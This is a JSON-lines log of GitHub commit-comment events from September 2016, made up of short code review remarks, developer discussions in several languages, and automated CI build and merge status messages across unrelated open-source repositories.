{"id":"4604575006","type":"CommitCommentEvent","actor":{"login":"rgbkrk"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":19135782,"position":null,"line":null,"path":null,"commit_id":"bc6d896a29b09f9ce68211507ff9ab66b16fffcd","created_at":"2016-09-22T19:28:27Z","updated_at":"2016-09-22T19:28:27Z","body":"Whoops, I just noticed I didn't force push a commit that added this on.\r\n\r\n> Then we could further consolidate things by adding to page-file-types if a file is \"static\" (e.g. needs wrapped by a react component) or not (is a react component itself).\r\n\r\nThat makes sense.\r\n\r\n> Want to take this on?\r\n\r\nLet me get the flow working with a notebook here and start using gatsby a bit more. If you still have that as an open issue then I can tackle it.\r\n"}},"created_at":"2016-09-22T19:28:27Z"}
{"id":"4604579296","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19135789,"position":null,"line":null,"path":null,"commit_id":"b31bfd002a6b665d4f7d86191036c198b1b312ec","created_at":"2016-09-22T19:29:17Z","updated_at":"2016-09-22T19:29:17Z","body":"1. зачем это свойство здесь?  - .menu-nav {\r\n    clear: both;\r\n} \r\n2. http://joxi.ru/VrwV59MSKNpJeA - чтобы сделать отступ большому блоку родителю, нужно ему и задавать отступ, а не внутренним блокам, \r\n3. "}},"created_at":"2016-09-22T19:29:17Z"}
{"id":"4604583053","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19135795,"position":null,"line":null,"path":null,"commit_id":"cff6a3b617fbd31f12470be5a8cd9cba6ee9d12c","created_at":"2016-09-22T19:30:00Z","updated_at":"2016-09-22T19:30:00Z","body":"#33 "}},"created_at":"2016-09-22T19:30:00Z"}
{"id":"4604583426","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19135797,"position":58,"line":58,"path":"session/xmlrpc.go","commit_id":"9e28558d8c983c6364d489969c5b06c27e7a307a","created_at":"2016-09-22T19:30:04Z","updated_at":"2016-09-22T19:30:04Z","body":"I actually don't think unlimited is a good default...."}},"created_at":"2016-09-22T19:30:04Z"}
{"id":"4604584264","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"node-influx/node-influx"},"payload":{"comment":{"id":19135800,"position":7,"line":115,"path":"test.js","commit_id":"a962c2f2c8a9fe46179a6ddda9c250ba7b6f9ae4","created_at":"2016-09-22T19:30:14Z","updated_at":"2016-09-22T19:30:14Z","body":"Bad comment style, or removed unintentionally?"}},"created_at":"2016-09-22T19:30:14Z"}
{"id":"4604585668","type":"CommitCommentEvent","actor":{"login":"Narflex"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":19135804,"position":4,"line":1585,"path":"java/sage/epg/sd/SDRipper.java","commit_id":"2eb0004ac454ee1ef9518276797e08da1700921f","created_at":"2016-09-22T19:30:28Z","updated_at":"2016-09-22T19:30:28Z","body":"Do they have \"Special\" for the 'getShowType' return value used here? If so, it's pretty nice to be able to force more SH shows to be unique...avoids duplicate recordings (which I recall getting a bunch of in SageTV before I made a change like this)"}},"created_at":"2016-09-22T19:30:28Z"}
{"id":"4604589488","type":"CommitCommentEvent","actor":{"login":"captainviet"},"repo":{"name":"itsnhduc/24Hrs"},"payload":{"comment":{"id":19135816,"position":null,"line":null,"path":null,"commit_id":"8101aadeea6c60bb99b04ffca5d124cce46b2af1","created_at":"2016-09-22T19:31:18Z","updated_at":"2016-09-22T19:31:18Z","body":"# Fix client-server data passing issue and Implement table startup instantiation\r\n## Client-server data passing\r\n\r\n- Update all server and client methods to reflect **data passing from server to client** _(not available on Meteor)_\r\n\r\n## Chatbox table startup instantiation\r\n\r\n- Instantiate a new Chatbox table if none exists, and ignore otherwise _(ensuring Singleton property)_"}},"created_at":"2016-09-22T19:31:18Z"}
{"id":"4604591205","type":"CommitCommentEvent","actor":{"login":"TheCyberBrick"},"repo":{"name":"Angry-Pixel/The-Betweenlands"},"payload":{"comment":{"id":19135823,"position":null,"line":null,"path":null,"commit_id":"8a566bab0b8d39391da2f703add1c01e4e589e3b","created_at":"2016-09-22T19:31:36Z","updated_at":"2016-09-22T19:31:36Z","body":"And fixed mipmapping bug"}},"created_at":"2016-09-22T19:31:36Z"}
{"id":"4604591279","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19135824,"position":56,"line":56,"path":"session/xmlrpc.go","commit_id":"9e28558d8c983c6364d489969c5b06c27e7a307a","created_at":"2016-09-22T19:31:37Z","updated_at":"2016-09-22T19:31:37Z","body":"Yes. We can do that in a separate PR to refactor and address jun li's issue for all transports."}},"created_at":"2016-09-22T19:31:37Z"}
{"id":"4604597534","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19135843,"position":null,"line":null,"path":null,"commit_id":"bbb0d1efd2ec15dec3e0c3eefe58b99708cb869b","created_at":"2016-09-22T19:32:44Z","updated_at":"2016-09-22T19:32:44Z","body":"@kamarush\r\nThanks!\r\nI created fix fo my device tree,\r\nhttps://github.com/nitrogen-os-devices/android_device_lge_hammerhead/commit/1a2484b3e55c128639f39a64dee2200f99969d7d"}},"created_at":"2016-09-22T19:32:44Z"}
{"id":"4604600050","type":"CommitCommentEvent","actor":{"login":"hwuerz"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19135846,"position":14,"line":14,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-22T19:33:13Z","updated_at":"2016-09-22T19:33:13Z","body":"Ich bin im Moment dabei meine private Filmdatenbank neu zu schreiben. Allerdings weiß ich noch nicht, ob die jemals richtig fertig wird, da ich ständig alles wieder umbaue. Das ist also ehr ein Spiel-Projekt, aber dafür in Java. Hast du etwas gefunden, bei dem du weiterhin Java entwickeln kannst?"}},"created_at":"2016-09-22T19:33:13Z"}
{"id":"4604601042","type":"CommitCommentEvent","actor":{"login":"lintool"},"repo":{"name":"yb1/GraphJet"},"payload":{"comment":{"id":19135850,"position":94,"line":94,"path":"graphjet-demo/src/main/java/com/twitter/graphjet/demo/PageRankDemo.java","commit_id":"2cf6416c8664311f26aeb285a35a70e228b1bfa1","created_at":"2016-09-22T19:33:23Z","updated_at":"2016-09-22T19:33:23Z","body":"Shouldn't you be using a directed graph?\r\nhttps://github.com/twitter/GraphJet/blob/master/graphjet-core/src/main/java/com/twitter/graphjet/directed/OutIndexedPowerLawMultiSegmentDirectedGraph.java\r\n"}},"created_at":"2016-09-22T19:33:23Z"}
{"id":"4604601708","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135851,"position":null,"line":null,"path":null,"commit_id":"43547c8273fcd9ca4f009c69cad832502e39d521","created_at":"2016-09-22T19:33:30Z","updated_at":"2016-09-22T19:33:30Z","body":"It is still possible to get a duplicate UID with this if two players buy a vehicle at the same time. Diag_tickTime returns seconds in A2."}},"created_at":"2016-09-22T19:33:30Z"}
{"id":"4604602209","type":"CommitCommentEvent","actor":{"login":"KyleAMathews"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":19135853,"position":null,"line":null,"path":null,"commit_id":"bc6d896a29b09f9ce68211507ff9ab66b16fffcd","created_at":"2016-09-22T19:33:35Z","updated_at":"2016-09-22T19:33:35Z","body":"Sounds great! I'll open an issue and assign it to you :-) It's not a pressing problem but it'd be nice to fix."}},"created_at":"2016-09-22T19:33:35Z"}
{"id":"4604604684","type":"CommitCommentEvent","actor":{"login":"lintool"},"repo":{"name":"yb1/GraphJet"},"payload":{"comment":{"id":19135863,"position":37,"line":37,"path":"graphjet-demo/src/main/java/com/twitter/graphjet/demo/PageRankDemo.java","commit_id":"2cf6416c8664311f26aeb285a35a70e228b1bfa1","created_at":"2016-09-22T19:34:01Z","updated_at":"2016-09-22T19:34:01Z","body":"Don't need this option."}},"created_at":"2016-09-22T19:34:01Z"}
{"id":"4604605354","type":"CommitCommentEvent","actor":{"login":"lintool"},"repo":{"name":"yb1/GraphJet"},"payload":{"comment":{"id":19135867,"position":44,"line":44,"path":"graphjet-demo/src/main/java/com/twitter/graphjet/demo/PageRankDemo.java","commit_id":"2cf6416c8664311f26aeb285a35a70e228b1bfa1","created_at":"2016-09-22T19:34:09Z","updated_at":"2016-09-22T19:34:09Z","body":"Can remove this comment."}},"created_at":"2016-09-22T19:34:09Z"}
{"id":"4604611937","type":"CommitCommentEvent","actor":{"login":"wastelandgoats"},"repo":{"name":"havena/GOAT-King-Of-The-Hill"},"payload":{"comment":{"id":19135880,"position":null,"line":null,"path":null,"commit_id":"e6a095c63e31e0cebf5ca8ace2937b9a5d824e16","created_at":"2016-09-22T19:35:21Z","updated_at":"2016-09-22T19:35:21Z","body":"this mission has not been updated in years sry."}},"created_at":"2016-09-22T19:35:21Z"}
{"id":"4604614556","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"jenkinsci/workflow-job-plugin"},"payload":{"comment":{"id":19135884,"position":null,"line":null,"path":null,"commit_id":"28dc6a691038cb9bca561323ad3a01c4b20a0d24","created_at":"2016-09-22T19:35:50Z","updated_at":"2016-09-22T19:35:50Z","body":"Thanks for making hard debugging in repository"}},"created_at":"2016-09-22T19:35:50Z"}
{"id":"4604615031","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.com"},"payload":{"comment":{"id":19135885,"position":null,"line":null,"path":null,"commit_id":"4164466390e19325af7c77590d15753f262f9981","created_at":"2016-09-22T19:35:55Z","updated_at":"2016-09-22T19:35:55Z","body":"Simplifies things and scales for offline use as more releases occur."}},"created_at":"2016-09-22T19:35:55Z"}
{"id":"4604615784","type":"CommitCommentEvent","actor":{"login":"darrenstahlmsft"},"repo":{"name":"Microsoft/docker"},"payload":{"comment":{"id":19135886,"position":46,"line":280,"path":"libcontainerd/container_windows.go","commit_id":"5eda6bc7afed9b23eb495cf2785fc802f9f64a80","created_at":"2016-09-22T19:36:04Z","updated_at":"2016-09-22T19:36:04Z","body":"Does this need to be aware if the container that spawned the waitExit is restarting?"}},"created_at":"2016-09-22T19:36:04Z"}
{"id":"4604616597","type":"CommitCommentEvent","actor":{"login":"krabradosty"},"repo":{"name":"krabradosty/pshkBlogAdmin"},"payload":{"comment":{"id":19135890,"position":41,"line":31,"path":"src/client/app/news/news.controller.js","commit_id":"4a0d9d975bbe1e5968a1d4b829251ffa20fbdd9e","created_at":"2016-09-22T19:36:14Z","updated_at":"2016-09-22T19:36:14Z","body":"во тута не правильно\r\n"}},"created_at":"2016-09-22T19:36:14Z"}
{"id":"4604617545","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19135894,"position":53,"line":85,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T19:36:25Z","updated_at":"2016-09-22T19:36:25Z","body":"Explained in chat: either move creation of all the functions that need access to the \"private\" variables to the constructor (there will be a set of method functions per instance), or, which is more practical, do not try to \"hide\" the data which is not sensitive, and just use a naming convention to designate the methods that should not be called from the outside."}},"created_at":"2016-09-22T19:36:25Z"}
{"id":"4604617598","type":"CommitCommentEvent","actor":{"login":"darrenstahlmsft"},"repo":{"name":"Microsoft/docker"},"payload":{"comment":{"id":19135895,"position":4,"line":12,"path":"libcontainerd/types.go","commit_id":"5eda6bc7afed9b23eb495cf2785fc802f9f64a80","created_at":"2016-09-22T19:36:26Z","updated_at":"2016-09-22T19:36:26Z","body":"This might be used to tell if a container is starting via event logs. Maybe it should also just be start-container? I guess we'll see in CI if it affects anything"}},"created_at":"2016-09-22T19:36:26Z"}
{"id":"4604618270","type":"CommitCommentEvent","actor":{"login":"parkan"},"repo":{"name":"mediachain/aleph"},"payload":{"comment":{"id":19135896,"position":23,"line":21,"path":"src/peer/base_node.js","commit_id":"0f0cb5dedca6e56207cd525309b4fd1f2c85b230","created_at":"2016-09-22T19:36:34Z","updated_at":"2016-09-22T19:36:34Z","body":"does it still complain if you do `class Node extends Object`?"}},"created_at":"2016-09-22T19:36:34Z"}
{"id":"4604629266","type":"CommitCommentEvent","actor":{"login":"RJP43"},"repo":{"name":"jonhoranic/theGraveyard"},"payload":{"comment":{"id":19135915,"position":null,"line":null,"path":null,"commit_id":"070e80d5d88a9530968c85a1eb0e3939c8dc1993","created_at":"2016-09-22T19:38:36Z","updated_at":"2016-09-22T19:38:36Z","body":"@laurenmcguigan SOOOOOOOOO cute! And HUZZAH I am so proud of everyone working Git so well 👍 "}},"created_at":"2016-09-22T19:38:36Z"}
{"id":"4604631720","type":"CommitCommentEvent","actor":{"login":"AlexsandraZlobina"},"repo":{"name":"AlexsandraZlobina/Alexsa"},"payload":{"comment":{"id":19135921,"position":1,"line":1,"path":"README.md","commit_id":"15556c5cb8c7dfb8d2840cbdbcaa5a94d9847bef","created_at":"2016-09-22T19:39:06Z","updated_at":"2016-09-22T19:39:06Z","body":"РИМ 250404"}},"created_at":"2016-09-22T19:39:06Z"}
{"id":"4604633341","type":"CommitCommentEvent","actor":{"login":"yusefnapora"},"repo":{"name":"mediachain/aleph"},"payload":{"comment":{"id":19135926,"position":23,"line":21,"path":"src/peer/base_node.js","commit_id":"0f0cb5dedca6e56207cd525309b4fd1f2c85b230","created_at":"2016-09-22T19:39:26Z","updated_at":"2016-09-22T19:39:26Z","body":"yeah, it does... good idea though.\r\n\r\nNo clue why it behaves differently here"}},"created_at":"2016-09-22T19:39:26Z"}
{"id":"4604635079","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":19135930,"position":null,"line":null,"path":null,"commit_id":"9b45f78f76418cf5ef5cdf4fb8b34de18e3865ed","created_at":"2016-09-22T19:39:48Z","updated_at":"2016-09-22T19:39:48Z","body":"Wow, what a huge project - and a huge improvement!"}},"created_at":"2016-09-22T19:39:48Z"}
{"id":"4604640897","type":"CommitCommentEvent","actor":{"login":"jvehent"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19135941,"position":140,"line":760,"path":"database/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T19:40:50Z","updated_at":"2016-09-22T19:40:50Z","body":"`IsSelfSigned()` should validate the cert signature with its own public key. I tried doing that initially, but it didn't work out of the box by doing `cert.CheckSignatureFrom(cert)`. "}},"created_at":"2016-09-22T19:40:50Z"}
{"id":"4604645975","type":"CommitCommentEvent","actor":{"login":"vaikhan2"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK"},"payload":{"comment":{"id":19135952,"position":53,"line":285,"path":"sdk/src/main/java/com/google/cloud/dataflow/sdk/util/BigQueryTableInserter.java","commit_id":"94d57207924ed8650cf3c97fccb2a45f27bcc6a3","created_at":"2016-09-22T19:41:49Z","updated_at":"2016-09-22T19:41:49Z","body":"The check is inverted, it should be nextBackoffMillis != BackOff.STOP\r\nOtherwise it causes Thread.sleep() to be called with value -1 which causes an IllegalArgumentException exception to be thrown."}},"created_at":"2016-09-22T19:41:49Z"}
{"id":"4604647129","type":"CommitCommentEvent","actor":{"login":"amitkm9204"},"repo":{"name":"amitkm9204/numeric_to_words1"},"payload":{"comment":{"id":19135955,"position":null,"line":null,"path":null,"commit_id":"d4a1b30bb3223936ce1168103522578c482ad55a","created_at":"2016-09-22T19:42:02Z","updated_at":"2016-09-22T19:42:02Z","body":"Source file"}},"created_at":"2016-09-22T19:42:02Z"}
{"id":"4604647889","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19135957,"position":null,"line":null,"path":null,"commit_id":"90ed550c3f6477a6c057eba6283312f74e26bafe","created_at":"2016-09-22T19:42:11Z","updated_at":"2016-09-22T19:42:11Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1771 of 1771 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-22T19:42:11Z"}
{"id":"4604648831","type":"CommitCommentEvent","actor":{"login":"krabradosty"},"repo":{"name":"krabradosty/pshkBlogAdmin"},"payload":{"comment":{"id":19135959,"position":1,"line":4,"path":"src/client/app/newsControl/controllers/newNews.controller.js","commit_id":"fd7a2300e5fae655dfc1067407d783831f4b90f3","created_at":"2016-09-22T19:42:22Z","updated_at":"2016-09-22T19:42:22Z","body":"зачем для new и update два разных контроллера? в них же одинаковая логика практически"}},"created_at":"2016-09-22T19:42:22Z"}
{"id":"4604650862","type":"CommitCommentEvent","actor":{"login":"krabradosty"},"repo":{"name":"krabradosty/pshkBlogAdmin"},"payload":{"comment":{"id":19135963,"position":6,"line":7,"path":"src/client/app/newsControl/controllers/newNews.controller.js","commit_id":"fd7a2300e5fae655dfc1067407d783831f4b90f3","created_at":"2016-09-22T19:42:47Z","updated_at":"2016-09-22T19:42:47Z","body":"зачем для new и update два разных контроллера? в них же одинаковая логика практически"}},"created_at":"2016-09-22T19:42:47Z"}
{"id":"4604652259","type":"CommitCommentEvent","actor":{"login":"gise88"},"repo":{"name":"monejava/amikaya-os-2011"},"payload":{"comment":{"id":19135965,"position":87,"line":87,"path":"Amikaya_GCC/header/listx.h","commit_id":"74980287f3a6c481e81bb7e0f55725f6230dc62c","created_at":"2016-09-22T19:43:03Z","updated_at":"2016-09-22T19:43:03Z","body":"Best #define evvà!"}},"created_at":"2016-09-22T19:43:03Z"}
{"id":"4604652385","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19135966,"position":null,"line":null,"path":null,"commit_id":"90ed550c3f6477a6c057eba6283312f74e26bafe","created_at":"2016-09-22T19:43:05Z","updated_at":"2016-09-22T19:43:05Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T19:43:05Z"}
{"id":"4604653632","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135968,"position":null,"line":null,"path":null,"commit_id":"43547c8273fcd9ca4f009c69cad832502e39d521","created_at":"2016-09-22T19:43:19Z","updated_at":"2016-09-22T19:43:19Z","body":"I added it to every _x when I changed mine. that way 2 players would have to buy something at the exact same place, at the exact same second and the server would have to process the eh for spawning a purchased vehicle for both players at the exact same second which is highly unlikely."}},"created_at":"2016-09-22T19:43:19Z"}
{"id":"4604661174","type":"CommitCommentEvent","actor":{"login":"yusefnapora"},"repo":{"name":"mediachain/aleph"},"payload":{"comment":{"id":19135979,"position":23,"line":21,"path":"src/peer/base_node.js","commit_id":"0f0cb5dedca6e56207cd525309b4fd1f2c85b230","created_at":"2016-09-22T19:44:46Z","updated_at":"2016-09-22T19:44:46Z","body":"ah, looks like I had an old version of flow installed... still don't know why it worked on some files and not others, but updating to the latest flow lets me omit the semis everywhere"}},"created_at":"2016-09-22T19:44:46Z"}
{"id":"4604661499","type":"CommitCommentEvent","actor":{"login":"rivasd"},"repo":{"name":"rivasd/djPsych"},"payload":{"comment":{"id":19135980,"position":5,"line":11,"path":"djmanager/templates/includes/navbar.html","commit_id":"dc86f479730d6d46cbdb9492f901e5d2da968325","created_at":"2016-09-22T19:44:50Z","updated_at":"2016-09-22T19:44:50Z","body":"WTF??"}},"created_at":"2016-09-22T19:44:50Z"}
{"id":"4604665982","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19135986,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-22T19:45:43Z","updated_at":"2016-09-22T19:45:43Z","body":"I don't think so, because my \"fix\" is for when the move m itself is illegal (nextVictim == color_of(m)), while the test at the exit condition of the loop is for preventing illegal captures in the ensuing captures sequence on the critical square (in other words, nextVictim has always been calculated at least twice when we reach the loop condition)."}},"created_at":"2016-09-22T19:45:43Z"}
{"id":"4604670270","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19135991,"position":null,"line":null,"path":null,"commit_id":"9df3d60efa063adf509705ab5246fed94d37b780","created_at":"2016-09-22T19:46:33Z","updated_at":"2016-09-22T19:46:33Z","body":"@snicolet If our king position changes, then the discovered check candidates do not become invalid for the other side, the just do not check anymore so IMO in that case it turns wrong to prefer them  over  the other possible recapture mives. Maybe then you recapture with a Rook whilst a pawn should do instead.\r\n\r\nP.s: I dont think that SEE actually allows the king moving into check,\r\nsee comment on the test you mention above."}},"created_at":"2016-09-22T19:46:33Z"}
{"id":"4604670407","type":"CommitCommentEvent","actor":{"login":"krabradosty"},"repo":{"name":"krabradosty/pshkBlogAdmin"},"payload":{"comment":{"id":19135993,"position":13,"line":10,"path":"src/client/app/newsControl/controllers/newNews.controller.js","commit_id":"fd7a2300e5fae655dfc1067407d783831f4b90f3","created_at":"2016-09-22T19:46:34Z","updated_at":"2016-09-22T19:46:34Z","body":"зачем ты переход на страницу вынес в сервис? сервис отвчает за загрузку данных. выноси переход обратно в контроллер. у тебя же есть места, где ты делаешь переходы. ты делаешь их из контроллера. че ты тут решил засунуть его в сервис?"}},"created_at":"2016-09-22T19:46:34Z"}
{"id":"4604672365","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135997,"position":null,"line":null,"path":null,"commit_id":"43547c8273fcd9ca4f009c69cad832502e39d521","created_at":"2016-09-22T19:46:56Z","updated_at":"2016-09-22T19:46:56Z","body":"There's no true random way to do this in ArmA without the chance of a collision. If you wish to handle collisions or add the players UID to the key modify the code, if not I think it's extremely unlikely as is. "}},"created_at":"2016-09-22T19:46:56Z"}
{"id":"4604673281","type":"CommitCommentEvent","actor":{"login":"vszakats"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19136000,"position":null,"line":null,"path":null,"commit_id":"1e9537fddd470adf618f7d4fbfd0612d5cbdfe79","created_at":"2016-09-22T19:47:08Z","updated_at":"2016-09-22T19:47:08Z","body":"For some reason I had the belief they'd abandon this archaic versioning starting 1.1, and go with 1.1.1. Seems like an opportunity missed."}},"created_at":"2016-09-22T19:47:08Z"}
{"id":"4604675176","type":"CommitCommentEvent","actor":{"login":"bfrggit"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19136001,"position":5,"line":58,"path":"packages/liotapkg.sh","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T19:47:30Z","updated_at":"2016-09-22T19:47:30Z","body":"1. Sure.\r\nHowever, if we don't have this replacement on schedule (maybe you do, I don't know), we should first make sure the piped version is tidy.\r\n\r\n2. I am okay with liota packages in `/etc`, but `/var` or `/usr` sound better.\r\nIn terms of user friendliness, maybe we are thinking of putting all user editable things in a same parent folder like `/etc/liota`?\r\nIn a complete ICE arch, it is AW agent putting packages in the package path.\r\nI am not very sure which one is better, though. \r\n\r\n3. Cool."}},"created_at":"2016-09-22T19:47:30Z"}
{"id":"4604675703","type":"CommitCommentEvent","actor":{"login":"artkuznetsov"},"repo":{"name":"artkuznetsov/my-first-blog"},"payload":{"comment":{"id":19136003,"position":null,"line":null,"path":null,"commit_id":"34e2a48d0d6222704f32904203427cbb0c06c43a","created_at":"2016-09-22T19:47:36Z","updated_at":"2016-09-22T19:47:36Z","body":"i like it =)"}},"created_at":"2016-09-22T19:47:36Z"}
{"id":"4604680877","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19136009,"position":null,"line":null,"path":null,"commit_id":"70345e281510e401e89ae90ac08acd2ce6ef4e7d","created_at":"2016-09-22T19:48:38Z","updated_at":"2016-09-22T19:48:38Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 257](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1218&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:27:51"}},"created_at":"2016-09-22T19:48:38Z"}
{"id":"4604680984","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19136010,"position":null,"line":null,"path":null,"commit_id":"dbb41afaf86846ad837bb29419af06f5af516f99","created_at":"2016-09-22T19:48:39Z","updated_at":"2016-09-22T19:48:39Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 258](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1219&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-22T19:48:39Z"}
{"id":"4604681452","type":"CommitCommentEvent","actor":{"login":"breethomas"},"repo":{"name":"turingschool/portfolios"},"payload":{"comment":{"id":19136013,"position":1,"line":1,"path":"students/1606-front/mike-sausa/mike-sausa-mod2.markdown","commit_id":"00f4a4a664c2da82c21ba38d3dc822873800a03d","created_at":"2016-09-22T19:48:45Z","updated_at":"2016-09-22T19:48:45Z","body":"You probably want to call this \"M2 Portfolio\""}},"created_at":"2016-09-22T19:48:45Z"}
{"id":"4604685373","type":"CommitCommentEvent","actor":{"login":"sherrellbc"},"repo":{"name":"ARMmbed/uvisor"},"payload":{"comment":{"id":19136025,"position":null,"line":null,"path":null,"commit_id":"06622510c07d186de3d404c68e316ec80e4c8770","created_at":"2016-09-22T19:49:33Z","updated_at":"2016-09-22T19:49:33Z","body":"@Patater \r\n\r\nWould you mind posting an example of using this code? There is a section in the uVisor [QuickStart](https://github.com/ARMmbed/uvisor/blob/master/docs/api/QUICKSTART.md#expose-public-secure-entry-points-to-the-secure-box) guide that references this mechanism but has remained blank. It currently says \"coming soon\". "}},"created_at":"2016-09-22T19:49:33Z"}
{"id":"4604686865","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19136030,"position":null,"line":null,"path":null,"commit_id":"99c92ed3ee9ef7759d54439a9727d6b96d5e5b36","created_at":"2016-09-22T19:49:50Z","updated_at":"2016-09-22T19:49:50Z","body":"saw approval from JeetKunDoug\nat https://github.com/basho/riak_kv/commit/99c92ed3ee9ef7759d54439a9727d6b96d5e5b36"}},"created_at":"2016-09-22T19:49:50Z"}
{"id":"4604686970","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19136031,"position":null,"line":null,"path":null,"commit_id":"99c92ed3ee9ef7759d54439a9727d6b96d5e5b36","created_at":"2016-09-22T19:49:52Z","updated_at":"2016-09-22T19:49:52Z","body":"merging basho/riak_kv/fixes/lrb/ensure-optional-pb-field-usage = 99c92ed3 into borshop-integration-1483-fixes/lrb/ensure-optional-pb-field-usage"}},"created_at":"2016-09-22T19:49:52Z"}
{"id":"4604686997","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19136032,"position":null,"line":null,"path":null,"commit_id":"99c92ed3ee9ef7759d54439a9727d6b96d5e5b36","created_at":"2016-09-22T19:49:52Z","updated_at":"2016-09-22T19:49:52Z","body":"basho/riak_kv/fixes/lrb/ensure-optional-pb-field-usage = 99c92ed3 merged ok, testing candidate = 87dfc0f4"}},"created_at":"2016-09-22T19:49:52Z"}
{"id":"4604691285","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19136040,"position":null,"line":null,"path":null,"commit_id":"8410967844275b226d439b1945a19f3b5856dcf5","created_at":"2016-09-22T19:50:44Z","updated_at":"2016-09-22T19:50:44Z","body":"\"allow\" deletion of user-defined channels\r\n\r\nalso improve the appearance of the table of channels"}},"created_at":"2016-09-22T19:50:44Z"}
